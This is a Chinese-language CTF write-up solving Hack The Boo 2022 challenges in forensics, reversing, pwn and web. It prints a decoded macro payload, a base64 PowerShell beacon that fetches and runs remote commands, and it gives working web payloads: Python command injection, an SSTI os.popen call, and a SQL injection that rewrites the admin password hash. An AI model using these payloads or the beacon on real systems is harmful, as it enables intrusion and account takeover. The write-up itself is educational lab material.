Hack The Boo 2022 CTF题目解析

WriteUp 2周前 admin
50 0 0

一个入门级的ctf比赛,网站链接:

https://ctf.hackthebox.com/event/details/hack-the-boo-637

Forensics

Halloween_Invitation

考点:

1.从文档中提取宏

2.对代码进行反混淆

Hack The Boo 2022 CTF题目解析

解压zip后,可以得到一个文档,后缀名.docm的意思是,这个文档启用了宏,我们要把宏提取出来

这里使用olevba.py脚本来提取宏

https://github.com/decalage2/oletools/blob/master/oletools/olevba.py

下载好后直接运行

python3 olevba.py /home/kali/hacktheboo2022/forensics/halloween_invitation/invitation.docm
Hack The Boo 2022 CTF题目解析

代码还被混淆了

Hack The Boo 2022 CTF题目解析

我们将这些代码复制出来

Hack The Boo 2022 CTF题目解析

写一个脚本来反混淆

#!/usr/bin/python
def decodeAsHex(str): return "".join([chr(int(str[i:i+2],16)) for i in range(0, len(str), 2)])
def decodeChar(str): return "".join([chr(int(s)) for s in str.split(' ')])

def getBase64EncodedPayload(): command = "" command = command + decodeChar(decodeAsHex("3734203635203636203132322036352036382034382036352037342031") + decodeAsHex("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033")) command = command + decodeChar(decodeAsHex("363520313230203635203638203130") + decodeAsHex("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532")) command = command + decodeChar(decodeAsHex("3635203638203635203635203734") + decodeAsHex("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737")) command = command + decodeChar(decodeAsHex("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + decodeAsHex("37203438203635203737203635203635203438203635203638203737203635203930")) command = command + decodeChar(decodeAsHex("313033203635203132312036352036382038312036352037372036352036352035") + decodeAsHex("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635")) command = command + decodeChar(decodeAsHex("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + decodeAsHex("3130203635")) command = command + decodeChar(decodeAsHex("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + decodeAsHex("36352031313820363520363720353620363520373420313139203635203535203635203637203831")) command = command + decodeChar(decodeAsHex("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + decodeAsHex("38203635203835")) command = command + decodeChar(decodeAsHex("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + decodeAsHex("203635203635")) command = command + decodeChar(decodeAsHex("313033203635203637203438203635203836203831203636203132322036352037312038") + decodeAsHex("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635")) command = command + decodeChar(decodeAsHex("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + decodeAsHex("2031313720363520373120393920363520373320363520363520313136203635203730203835203635")) command = command + decodeChar(decodeAsHex("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + decodeAsHex("3635203731203831203635203738203635")) command = command + decodeChar(decodeAsHex("363520313232203635203731203733203635") + decodeAsHex("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038")) command = command + decodeChar(decodeAsHex("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + decodeAsHex("20313033203635203639203635203635203130312031313920363520313035203635203639")) command = command + decodeChar(decodeAsHex("363920363520313030203831203636203438203635203731203130332036352039") + decodeAsHex("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831")) command = command + decodeChar(decodeAsHex("363520393720383120363620") + decodeAsHex("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030")) command = command + decodeChar(decodeAsHex("313139203636203131312036352037312031303720363520393820363520363620313038") + decodeAsHex("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636")) command = command + decodeChar(decodeAsHex("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + decodeAsHex("37203635203732")) command = command + decodeChar(decodeAsHex("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + decodeAsHex("20363520373120383520363520393920313139203636203438203635203639203438203635203930")) command = command + decodeChar(decodeAsHex("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + decodeAsHex("37203635203930203831203636203637")) command = command + decodeChar(decodeAsHex("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + decodeAsHex("37322037332036352039392031313920363620313132203635203731")) command = command + decodeChar(decodeAsHex("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + decodeAsHex("203635")) command = command + decodeChar(decodeAsHex("37342036352036362031323220363520363720") + decodeAsHex("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635")) command = command + decodeChar(decodeAsHex("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + decodeAsHex("2037312038352036352039392031303320363620313232203635203637")) command = command + decodeChar(decodeAsHex("36352036352038312036352036362035352036352036372037332036352038") + decodeAsHex("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937")) command = command + decodeChar(decodeAsHex("383120363620353420363520373120363920363520") + decodeAsHex("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636")) command = command + decodeChar(decodeAsHex("31313220363520373220343820363520") + decodeAsHex("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635")) command = command + decodeChar(decodeAsHex("3637") + decodeAsHex("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835")) command = command + decodeChar(decodeAsHex("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + decodeAsHex("373120383520363520313031")) command = command + decodeChar(decodeAsHex("36352036352031303320") + decodeAsHex("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636")) command = command + decodeChar(decodeAsHex("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + decodeAsHex("363720363520363520383520313139203636203438203635")) command = command + decodeChar(decodeAsHex("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + decodeAsHex("36352037322037332036352039382031313920363620313231203635203730203839")) command = command + decodeChar(decodeAsHex("363520383920383120363620313231203635203731203130372036352038392038") + decodeAsHex("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739")) command = command + decodeChar(decodeAsHex("3131392036352031303720363520373220373320363520383020383120") + decodeAsHex("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636")) command = command + decodeChar(decodeAsHex("3132312036352037") + decodeAsHex("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635")) command = command + decodeChar(decodeAsHex("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + decodeAsHex("203733")) command = command + decodeChar(decodeAsHex("3635203739203131392036352031303720363520373220383120363520383020383120363620") + decodeAsHex("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930")) command = command + decodeChar(decodeAsHex("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + decodeAsHex("3820363520373220383120363520393720363520363620313138")) command = command + decodeChar(decodeAsHex("3635203731203831203635203733") + decodeAsHex("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637")) command = command + decodeChar(decodeAsHex("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + decodeAsHex("3635")) command = command + decodeChar(decodeAsHex("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + decodeAsHex("3831203635203733203635")) command = command + decodeChar(decodeAsHex("363620383120") + decodeAsHex("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635")) command = command + decodeChar(decodeAsHex("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + decodeAsHex("203635203637203733203635203831203831203636203439203635203732203831203635")) command = command + decodeChar(decodeAsHex("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + decodeAsHex("20313033")) command = command + decodeChar(decodeAsHex("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + decodeAsHex("3131362036352036392037332036352039382031313920363620313037")) command = command + decodeChar(decodeAsHex("363520373220") + decodeAsHex("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731")) command = command + decodeChar(decodeAsHex("3438203635") + decodeAsHex("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938")) command = command + decodeChar(decodeAsHex("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + decodeAsHex("203836203635203636")) command = command + decodeChar(decodeAsHex("37312036352036382031303320363520373620313033203636203732203635203731") + decodeAsHex("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635")) command = command + decodeChar(decodeAsHex("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + decodeAsHex("20313033203635203637203438")) command = command + decodeChar(decodeAsHex("36352039372031303320363620") + decodeAsHex("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635")) command = command + decodeChar(decodeAsHex("313032") + decodeAsHex("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033")) command = command + decodeChar(decodeAsHex("363520353220363520373220343820363520383320363520363620") + decodeAsHex("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635")) command = command + decodeChar(decodeAsHex("373220373320363520383820313139203635203132322036352036382038312036352037382038") + decodeAsHex("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635")) return command + decodeChar(decodeAsHex("393920313033203635203131392036352036382038352036352031303220383120") + decodeAsHex("3635203631"))
print(getBase64EncodedPayload())
Hack The Boo 2022 CTF题目解析

运行脚本后,可以看到base64加密后的密文,我们解密

echo "JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=" | base64 -d

得到flag

Hack The Boo 2022 CTF题目解析
HTB{5up3r_345y_m4cr05}

TrickOrBreach

考点:

1.DNS流量分析

双击打开流量包

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

发现都是dns的流量,通过strings工具发现了很多十六进制

Hack The Boo 2022 CTF题目解析

我们把这些十六进制导出来

tshark -r capture.pcap -T fields -e dns.qry.name > a.txt
Hack The Boo 2022 CTF题目解析

用文本编辑器把.pumpkincorp.com字符去掉

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

然后再用uniq工具将重复的字符串去掉

cat a.txt| uniq > b.txt
Hack The Boo 2022 CTF题目解析

将十六进制转换为ascii码可以发现,这是一个Excel 文件

Hack The Boo 2022 CTF题目解析

导入unzip模块就能找到flag

Hack The Boo 2022 CTF题目解析

HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch}

Wrong_Spooky_Season

考点:流量分析

Hack The Boo 2022 CTF题目解析

双击打开流量包

Hack The Boo 2022 CTF题目解析

查看流量包协议分级

Hack The Boo 2022 CTF题目解析

选择data数据

Hack The Boo 2022 CTF题目解析

跟踪流量包可以发现一串base64密文

Hack The Boo 2022 CTF题目解析

是倒转过来的,我们转回去即可

echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d

Hack The Boo 2022 CTF题目解析

得到flag

HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}

或者直接用strings工具查看流量包里的字符串

strings capture.pcap

Hack The Boo 2022 CTF题目解析

Reversing

Cult_Meeting

分析程序,发现是64位的,我们直接用ida来静态分析

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

char s[64]; // [rsp+0h] [rbp-40h] BYREF
setvbuf(_bss_start, 0LL, 2, 0LL); puts("x1B[3mYou knock on the door and a panel slides backx1B[0m"); puts(asc_2040); fwrite(""What is the password for this week's meeting?" ", 1uLL, 0x30uLL, _bss_start); fgets(s, 64, stdin); *strchr(s, 10) = 0; if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") ) { puts("x1B[3mThe panel slides closed and the lock clicksx1B[0m"); puts("| | "Welcome inside..." "); system("/bin/sh"); } else { puts(" \/"); puts(asc_2130); }
  if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") )    ……    system("/bin/sh");    ……

最关键的是if判断这里,他会将我们输入的字符和sup3r_s3cr3t_p455w0rd_f0r_u!字符串做比较。如果一样就会给我们一个shell

我们直接输入sup3r_s3cr3t_p455w0rd_f0r_u!即可

Hack The Boo 2022 CTF题目解析

成功得到flag

HTB{1nf1ltr4t1ng_4_cul7_0f_str1ng5}

EncodedPayload

Hack The Boo 2022 CTF题目解析

这是一个32位的程序,但是运行时什么也不输出,我们用strace来跟踪文件的系统调用

strace ./encodedpayload

Hack The Boo 2022 CTF题目解析

成功得到flag

HTB{PLz_strace_M333}

Ghost_Wrangler

Hack The Boo 2022 CTF题目解析

这是一个64位的程序,我们用ida打开来静态分析

Hack The Boo 2022 CTF题目解析

const char *flag; // [rsp+8h] [rbp-8h]
flag = (const char *)get_flag(argc, argv, envp); printf( "%sr|x1B[4m%*.cx1B[24m| I've managed to trap the flag ghost in this box, but it's turned invisible!n" "Can you figure out how to reveal them?n", flag, 40, 95LL); return 0;

很简单的程序,他会把flag载入,到时候我们直接看程序的堆栈就好了

用gdb运行程序,我们在main函数地址处下一个断点,慢慢执行

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

在执行了call指令后,可以得到flag

HTB{h4unt3d_by_th3_gh0st5_0f_ctf5_p45t!}

Ouija

Hack The Boo 2022 CTF题目解析

这是一个64位的程序,继续用ida打开来静态分析

Hack The Boo 2022 CTF题目解析

在最上面可以看到一串奇怪的字符

Hack The Boo 2022 CTF题目解析

然后对这个字符串进行了一些操作,通过分析,只是简单的置换字符串,我们使用ROT13就能得到flag
Hack The Boo 2022 CTF题目解析

HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!}

Secured_transfer

Hack The Boo 2022 CTF题目解析

有一个程序和流量包,我们双击打开流量包

Hack The Boo 2022 CTF题目解析

只是几条tcp的交互,但是有一条带有FIN、PSH和ACK的流量,而且下面还有加密的数据字符串

Hack The Boo 2022 CTF题目解析

5f558867993dccc99879f7ca39c5e406972f84a3a9dd5d48972421ff375cb18c

分析程序,发现是64位的,直接用ida打开分析

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

这个程序只是监听端口,然后传输文件的,但是在一个函数里,发现了加密的密钥

Hack The Boo 2022 CTF题目解析

用AES解密就能得到flag

Hack The Boo 2022 CTF题目解析

HTB{vryS3CuR3_F1L3_TR4nsf3r}

PWN

Pumpkin_Stand

Hack The Boo 2022 CTF题目解析

打开ida,进行静态分析

Hack The Boo 2022 CTF题目解析

首先打开了菜单,将我们的输入存入v3变量中,然后问我们需要多少个,将值存入v4里

Hack The Boo 2022 CTF题目解析

然后pumpcoins数是减去我们输入的两个值的乘积,但是这行代码会导致整数溢出漏洞

Hack The Boo 2022 CTF题目解析

当逻辑假定结果值将始终大于原始值时,软件执行的计算可能会产生整数溢出

如果我们输入1,就不会进入flag模块里,所以我们不能输入1

Hack The Boo 2022 CTF题目解析

pumpcoins > 9998就会输出flag

运行程序

Hack The Boo 2022 CTF题目解析

选择2

Hack The Boo 2022 CTF题目解析

只要输入足够大的数字,就会触发漏洞,获得flag

Hack The Boo 2022 CTF题目解析

获得flag

Web

Evaluation_Deck

访问网站,发现只是一个小游戏

Hack The Boo 2022 CTF题目解析

启动burp,然后随便点击一张牌

Hack The Boo 2022 CTF题目解析

在下面有一些参数,怪物的血量是100,我们-54

Hack The Boo 2022 CTF题目解析

刷新网页,我们改一下造成的伤害试试

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

赢了,但是什么也没弹出来

Hack The Boo 2022 CTF题目解析

通过分析源代码可以知道,我们可以利用operator参数来执行命令

nimport subprocess as spnresult=sp.getoutput('cat ../flag.txt')ny =

执行payload,获得flag

Hack The Boo 2022 CTF题目解析

Spookifier

打开网站,有一个输入框,我们随便输入一些东西

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

他会获取我们的输入,然后再输出

通过分析源码可以发现

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

我们的输入直接传到了里面,没有经过检查,这样会导致ssti漏洞

我们测试一下存不存在ssti漏洞

Hack The Boo 2022 CTF题目解析

漏洞存在,我们直接获取flag即可

${self.module.cache.util.os.popen("cat ../flag.txt").read()}
Hack The Boo 2022 CTF题目解析

Horror_Feeds

去到网站上,发现是一个登录页面

Hack The Boo 2022 CTF题目解析我们分析一下源代码

Hack The Boo 2022 CTF题目解析 Hack The Boo 2022 CTF题目解析

只有当我们是admin用户登录的时候,才能看到源代码

Hack The Boo 2022 CTF题目解析

我们输入的用户名直接带到数据库里查询了,这会造成sql注入

Hack The Boo 2022 CTF题目解析

由于这个查询没有检查我们输入的字符串,我们将管理员的密码哈希更改为我们自己生成的哈希

Hack The Boo 2022 CTF题目解析

密码是经过hash处理的,我们更改的密码也要生成这种hash值

Hack The Boo 2022 CTF题目解析

然后注入username参数,更改管理员密码哈希值

{"username":"admin","$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2") ON DUPLICATE KEY UPDATE password="$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2"#"}
Hack The Boo 2022 CTF题目解析

更改成功,登录即可看到flag

Juggling_Facts

打开网站

Hack The Boo 2022 CTF题目解析

只有右边这三个按键能用,点击secret facts按键,网站显示需要admin用户才能看

Hack The Boo 2022 CTF题目解析

查看源代码

Hack The Boo 2022 CTF题目解析

PHP有一个type juggling的功能,php在比较不同类型的变量时,会首先将它们转换为一个通用的可比较的类型

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析

文章网站:

https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09

简单来说就是

"a"=="a"  -> true"a"==true -> true

Hack The Boo 2022 CTF题目解析

Hack The Boo 2022 CTF题目解析 Hack The Boo 2022 CTF题目解析 Hack The Boo 2022 CTF题目解析

我们直接发送true即可获得flag

Hack The Boo 2022 CTF题目解析


原文始发于微信公众号(星盟安全):Hack The Boo 2022 CTF题目解析

版权声明:admin 发表于 2022年11月17日 上午11:09。
转载请注明:Hack The Boo 2022 CTF题目解析 | CTF导航

相关文章

暂无评论

暂无评论...